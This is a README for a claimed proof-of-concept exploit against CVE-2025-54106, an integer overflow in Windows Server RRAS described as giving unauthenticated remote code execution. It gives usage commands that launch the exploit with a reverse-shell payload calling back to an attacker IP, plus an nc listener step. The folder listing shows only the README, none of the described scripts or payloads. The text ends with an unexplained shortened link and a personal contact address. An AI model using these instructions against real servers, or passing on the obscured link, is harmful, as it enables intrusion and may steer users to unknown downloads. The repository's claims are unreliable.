# CVE-2025-54106 - Windows RRAS Integer Overflow Exploit
## Overview
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54106, a critical integer overflow vulnerability in the Routing and Remote Access Service (RRAS) component of Microsoft Windows Server versions from 2012 R2 up to 2022 23H2. The vulnerability allows remote code execution (RCE) without authentication by sending specially crafted network packets that trigger an integer wraparound during packet processing.
The exploit targets the RRAS service, typically exposed on ports like 1701 (L2TP), 1723 (PPTP), or others depending on configuration. It exploits an integer overflow in the handling of routing table entries or connection parameters, leading to memory corruption and arbitrary code execution in SYSTEM context.
This PoC is for educational and security research purposes only. It demonstrates the vulnerability in a controlled lab environment. Do not use on production systems or without permission.
## Requirements
- Python 3.10 or higher
- Access to a vulnerable Windows Server instance with RRAS enabled and exposed
- Attacker machine on the same network or with remote access to the target
- Tested on:
- Windows Server 2022 23H2 (Build 20348.2527)
- Windows Server 2019 (Build 17763.5936)
## Usage
The main exploit script is `exploit.py`. It crafts and sends malformed packets to trigger the overflow.
### Basic Command
```
python exploit.py --target <TARGET_IP> --port <PORT> --payload <PAYLOAD_TYPE> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
```
- `--target`: IP address of the vulnerable RRAS server.
- `--port`: Port where RRAS is listening (default: 1701 for L2TP).
- `--payload`: Type of payload.
- `--lhost`: Attacker's IP for reverse connections.
- `--lport`: Attacker's listening port (default: 4444).
- `--verbose`: Enable detailed output (optional).
### Example
**Reverse Shell:**
```
python exploit.py --target 192.168.1.100 --port 1701 --payload reverse_shell --lhost 192.168.1.50 --lport 4444
```
Start a listener on your machine (e.g., `nc -lvnp 4444`) before running.
### Payload Customization
Custom payloads can be added in the `payloads/` directory. See `payloads/reverse_shell.bin` for an example.
### Mitigation
- Apply the official patch from Microsoft: [MSRC Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54106).
- Disable RRAS if not needed.
- Use firewalls to restrict access to RRAS ports.
## Files in Folder
- `exploit.py`: Main exploit script.
- `requirements.txt`: Python dependencies.
- `payloads/`: Directory for shellcode and binaries (e.g., `reverse_shell.bin`).
- `docs/`: Additional notes on ROP chains and memory layouts for different server versions.
## Disclaimer
This tool is intended for security professionals and researchers. The author assumes no liability for any damages. Use responsibly and ethically.
[href](https://tinyurl.com/5n9aw3jz)
For any inquiries, please email me at: eviedejesu803@gmail.com
[4.0K] /data/pocs/ec70fad53bdc8460ea9641f8080b32ed9bbb08a7
└── [2.9K] README.md
0 directories, 1 file